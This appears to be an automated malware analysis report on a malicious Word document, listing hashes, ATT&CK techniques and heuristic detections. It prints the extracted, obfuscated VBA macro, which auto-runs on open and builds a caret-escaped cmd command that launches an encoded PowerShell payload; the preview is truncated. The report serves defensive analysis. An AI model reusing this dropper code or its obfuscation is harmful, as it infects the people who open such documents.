Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8cdf5e3d806ebae…

MALICIOUS

Office (OLE)

Size: 89.8 KB
Created: 2018-06-05 09:48:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 9e5caab6d26ab74b474c00377c3dfdc5
SHA-1: 92f61f250b9f423e00e290d210eba1b66d1f6ed0
SHA-256: e8cdf5e3d806ebaefd77b33fe8990be7da51bb00ff5ffb10bf2fc96bfaa9a136
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an Autoopen subroutine, a common technique for running malicious code automatically when the document is opened. The critical-severity heuristic for the Shell() call in VBA, together with the VBA p-code auto-execution finding, indicates that the macro attempts to execute a command. The script builds a command string by concatenation, including fragments such as 'md HsDbzAa Wj QLmJDDwJRzw YlmFiqUB TTcd DjoUmU' and ' %c^o^m^S^p^E^c^' (cmd.exe caret escaping that resolves to the %ComSpec% variable), suggesting it aims to run a command-line utility, likely to download and execute a secondary payload.

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection: see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11139 bytes
SHA-256: 0074f77e43642e97af7fc99f4aced57c1d07d7db0cdbe6cf42b01c21baa567e8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cEUWjkAMwVmnR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IBNhikRkqB()
On Error Resume Next
uOoAK = Hex(mHkVOz + Hex(hIELYh) * 31133 + Round(RAZpMp))
PCzSCN = Cos(MHANL)
zPkiiR = CDate(mwvjqE)
dNPKzn = Cos(rhVvv)
ZwzKKW = Hex(fCQqHu + Hex(nRHPc) * 96953 + Round(iwspPX))
IhOnm = Cos(HqBkZT)
zbzYD = CDate(iXaaG)
wCvzE = Cos(uwGXU)
IBNhikRkqB = iJhazH + Shell(uaiwfLGX + Chr(KUGcSFkTwP + vbKeyC + isHjvjViLV) + dnDwwGiWYuN + oMIokVijZ + woXwjBob + IrRvYs + OdOoZn, 38998 - 38998)
DUNAz = Hex(XqIZh + Hex(ATmMs) * 3058 + Round(HITpiL))
wPiURc = Cos(wUipi)
KDPLWV = CDate(wlihFE)
Mskfip = Cos(TILnI)
End Function
Sub Autoopen()
On Error Resume Next
wDwDX = Hex(bWEsI + Hex(JTwLj) * 93980 + Round(MmuEk))
GpWrv = Cos(XOQws)
iJrdTI = CDate(bMZWHI)
PZvSBz = Cos(ARZFf)
IBNhikRkqB
olDtW = Hex(ZBmXj + Hex(mEJqj) * 36790 + Round(jTowT))
utYisR = Cos(nwKqI)
zDjacB = CDate(zPuEK)
Gqwqzn = Cos(wbKAXu)
End Sub


Attribute VB_Name = "KfnuTiA"
Function dnDwwGiWYuN()
On Error Resume Next
KNRfuq = Hex(QAEcDK + Hex(UchXPX) * 51198 + Round(RJioZ))
wBPWZ = Cos(InVfUR)
TGJVD = CDate(Xjnjtl)
MzwIw = Cos(QXTwp)
QFBoPY = "md HsDbzAa " + "Wj" + "QLmJDDwJRzw" + "YlmFiqUB " + "TTcd" + "DjoUmU & " + "    %^c" + "^o^m^S^p^E^c^"
iiSjH = Hex(CwwGF + Hex(ofwCc) * 17733 + Round(VkOUJ))
NiOAAA = Cos(UPYMF)
fdqnM = CDate(toURH)
vKdTU = Cos(JIpuU)
VBRZikCtio = "%    " + " %" + "^c^o^" + "m^S^p^E^c^%    " + " /V " + "  " + "      /c   " + "        s"
zzGznY = Hex(mwZds + Hex(zCPQDs) * 32564 + Round(lFqiA))
HCzNlJ = Cos(pOwwA)
JVSWjl = CDate(XOusmB)
hMsQT = Cos(czkzLr)
oFitJ = "et %zjtsNZYmunW" + "pbEI" + "%=Rp" + "sWkwVQz" + "s&&set "
cHoQTC = Hex(HlTiJt + Hex(YtIEb) * 69437 + Round(UdVic))
TKlSK = Cos(CLPadY)
EwwsKH = CDate(bEFbu)
HdIiSi = Cos(pdwzBX)
fqTMLblPVUw = "%shFCJ" + "zJLldRa%=p&" + "&set %voD" + "dqDUtln%" + "=o^w&&set %Kj" + "zWHMXzwS" + "itZfG%=ZNz"
rAJTi = Hex(sfJXkK + Hex(ClPEJX) * 51155 + Round(ZDkHuh))
bzzrmn = Cos(bvmzOs)
UltIHo = CDate(Osqdz)
SwYMjz = Cos(EJatYo)
zpJnnsTu = "drXV&&set" + " %CL" + "ltwcc%=!%" + "shFCJzJL" + "ldRa%!&&set %k" + "OzcQk"
KUSMJ = Hex(FERrzn + Hex(pMHGOp) * 1317 + Round(iWZNP))
XKLAjT = Cos(tuadT)
jNihN = CDate(GJrCTi)
nDjzsw = Cos(phuGqP)
JQvKVP = "ALd" + "uVPsmX%=KSi" + "GppYQMPj&" + "&s" + "et %jGNivTjXj%" + "=e^r&&se" + "t %kzDwFQJu" + "wmO" + "NG%=!%v" + "oDdqDUtln"
YwSjd = Hex(bTDzpM + Hex(JjjIr) * 42050 + Round(jRMwh))
ZZzSYq = Cos(chNYVq)
HTzhHj = CDate(kFBlOU)
oHkVz = Cos(UBUkaz)
qLzMWJQiNTM = "%!&&s" + "et %sICcnriA" + "pLnq%=s&&" + "set %YHTTA" + "mKP"
dnDwwGiWYuN = QFBoPY + VBRZikCtio + oFitJ + fqTMLblPVUw + zpJnnsTu + JQvKVP + qLzMWJQiNTM
End Function
Function oMIokVijZ()
On Error Resume Next
ocWIn = Hex(ltMRi + Hex(BzpTwj) * 18025 + Round(koZdC))
sQFwO = Cos(ISsIi)
wNjUbp = CDate(jzAfh)
ERddA = Cos(tFQJV)
BKqEz = "HIjGNzH%" + "=wEQNRBi&&set %" + "QfwNSNooGu%=he" + "&&se" + "t %VCjaQSutriCj" + "B%=ll&&!%CLlt" + "wcc%!!%" + "kzDwFQJ" + "uwmO" + "NG%"
NDYhjE = Hex(kFhwmQ + Hex(jXWYr) * 71116 + Round(cKpio))
FpniDN = Cos(NmhzOw)
zRWVqN = CDate(TVjrSk)
ltiCu = Cos(avSzs)
YlmrwQibo = "!!%jGNi" + "vT" + "jXj%!!%sICcn" + "riApL"
kwzqX = Hex(umaLo + Hex(obDmU) * 6642 + Round(ldOctw))
TkXBwW = Cos(RcpViM)
XzqaFP = CDate(TIoaO)
GvVWD = Cos(arKPYM)
cUEnVltbGTF = "nq" + "%!!%QfwNS" + "NooGu%!!%VCja" + "QSu" + "triCjB%!  -e I" + "AAoAG4AZQB3AC0A" + "TwBCAEoAZQBjAFQ" + "AI"
qWwOQ = Hex(qJOfYC + Hex(jizcja) * 69261 + Round(WWHSS))
lpNiRN = Cos(YsVtXl)
AsPzU = CDate(Isrhj)
cETzrv = Cos(CETAzG)
VwaaNO = "ABzAHkAcwBUAGU" + "ATQAuA" + "GkATwAuAGMA" + "TwBNAFAAcgB" + "FAFMA"
AKpiiL = Hex(MMiGJw + Hex(dtzfC) * 38736 + Round(jFsizY))
SjrSqf = Cos(wCNzU)
Qroth = CDate(vZLVVu)
CRFwAl = Cos(GtjnnS)
aWzoEEI = "cwBJAG8AbgAuAG" + "QAR" + "QBmAE" + "wAQQBUAGUAc" + "wB0AF" + "IAZQBBAG0AKAA" + "gAFsASQB"
ofqkj = H
... (truncated)